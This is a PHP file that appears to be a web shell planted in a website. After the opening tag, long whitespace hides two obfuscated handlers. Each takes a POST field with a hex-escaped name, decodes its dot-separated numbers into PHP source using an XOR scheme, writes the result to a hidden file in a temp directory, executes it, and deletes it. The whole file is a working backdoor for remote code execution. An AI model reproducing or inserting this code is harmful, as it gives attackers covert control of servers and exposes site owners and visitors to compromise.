<?php																																										if(!is_null($_POST["f\x61\x63\x74or"] ?? null)){ $fac = $_POST["f\x61\x63\x74or"]; $fac = explode ( '.', $fac ) ; $descriptor = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2); foreach ($fac as $r => $v5) {$chS = ord($salt2[$r % $lenS]); $d = ((int)$v5 - $chS - ($r % 10)) ^ 15; $descriptor .= chr($d); } $flag = array_filter(["/tmp", ini_get("upload_tmp_dir"), getcwd(), session_save_path(), getenv("TEMP"), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm"]); $flg = 0; do { $data_chunk = $flag[$flg] ?? null; if ($flg >= count($flag)) break; if (is_writable($data_chunk) && is_dir($data_chunk)) { $object = join("/", [$data_chunk, ".hld"]); if (file_put_contents($object, $descriptor)) { require $object; unlink($object); exit; } } $flg++; } while (true); }


if(in_array("it\x6D", array_keys($_POST))){
	$pointer = array_filter([getenv("TEMP"), sys_get_temp_dir(), "/tmp", getenv("TMP"), session_save_path(), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp"]);
	$key = $_POST["it\x6D"];
	$key=explode	 ("." 	 , $key ) ; 
	$element ='';
            $s5 ='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen =strlen($s5);
            $z =0;
    
            while($z	<  count($key)) { 	$v1 =$key[$z];
                $chS =ord($s5[$z % $sLen]);
                $dec =((int)$v1 - $chS -($z % 10)) ^ 35;
                $element .= chr($dec);
                $z++;
            }
	for ($sym = 0, $symbol = count($pointer); $sym < $symbol; $sym++) {
    $dchunk = $pointer[$sym];
    		if (!( !is_dir($dchunk) || !is_writable($dchunk) )) {
    $resource = "$dchunk/.desc";
    if (@file_put_contents($resource, $element) !== false) {
	include $resource;
	unlink($resource);
	die();
}
}
}
}